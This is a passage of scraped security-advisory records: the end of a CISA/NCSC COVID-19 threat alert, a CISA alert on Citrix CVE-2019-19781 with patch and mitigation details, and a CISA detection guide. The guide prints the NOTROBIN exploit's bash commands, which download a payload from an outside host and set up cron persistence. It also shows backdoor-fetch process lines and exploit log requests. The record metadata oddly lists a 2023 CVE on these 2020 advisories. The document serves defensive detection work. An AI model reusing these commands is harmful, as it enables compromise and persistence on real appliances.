Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [AA20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Future\u2019s report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used in COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. 
Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN 
Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority** \u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency** \u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion** \u2013 Does the message make you panic, fearful, hopeful, or curious? 
Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity** \u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014for online meetings. 
In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. 
Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. 
March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020.](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30, 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:14:28", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigation steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA released a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The 
National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released a blog post on CVE-2019-19781 with a timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing its utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that the Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and a blog post on an accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP releases 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix 
Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. 
The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>) CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification Tool](<https://support.citrix.com/article/CTX269180>). **Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. 
Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. 
Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Security Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN 
WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and 
Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnerable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2023-27350"], "modified": "2020-05-21T12:00:00", "id": "AA20-020A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-020a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T15:14:22", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be 
targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. 
Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running 
under the `nobody` user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n``nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `-- sh -c uname & curl -o - http://10.1.1.2/backdoor``\n\nFurther pivoting can be completed using the Process ID from the `ps` output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while redirecting all of the errors into a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. 
